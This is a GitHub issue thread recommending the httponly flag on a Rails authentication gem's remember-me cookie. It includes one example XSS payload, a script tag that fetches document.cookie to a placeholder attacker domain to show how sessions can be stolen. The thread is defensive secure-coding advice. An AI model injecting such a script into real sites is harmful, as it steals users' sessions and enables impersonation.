### ISSUE TITLE
set httponly cookie

### ISSUE THREAD

**Issue by lazaronixon** [stevepolitodesign/rails_mvp_authentication#53]
https://github.com/stevepolitodesign/rails_mvp_authentication/blob/b2e0ebd8badafbcf337d57e6828e69afb77cfd1b/lib/generators/rails_mvp_authentication/templates/authentication.rb.tt#L38

```
cookies.permanent.encrypted[:remember_token] =  { value: active_session.remember_token, httponly: true }
```

Someone can use 'document.cookies' and stole your cookie if you don't use httponly.

**Comment by stevepolitodesign** [comment]
Thank you for pointing this out! This is making me wonder if I should just force SSL instead:

```ruby
# config/environments/production.rb
Rails.application.configure do
  ...
  config.force_ssl = true
end
```

**Comment by lazaronixon** [comment]
No, it is a javascript code vulnerability, rails implements CSP to prevent it, but some people disable it… So it’s better to have it.
Imagine a blog system someone posts `<script>d=document;fetch(`//attaker.com/value=${d.cookie}`)</script> ` every one who have seen this post will have their sessions stolen

**Comment by stevepolitodesign** [comment]
Oh, interesting. Will the stolen cookie still be encrypted? Does `httponly` simply prevent JavaScript from accessing this value?

**Comment by lazaronixon** [comment]
Excatly... but with your cookies, I can put them here in my browser impersonate you

**Comment by stevepolitodesign** [comment]
@lazaronixon thank you so much for the explanation. I'm learning a lot from you!
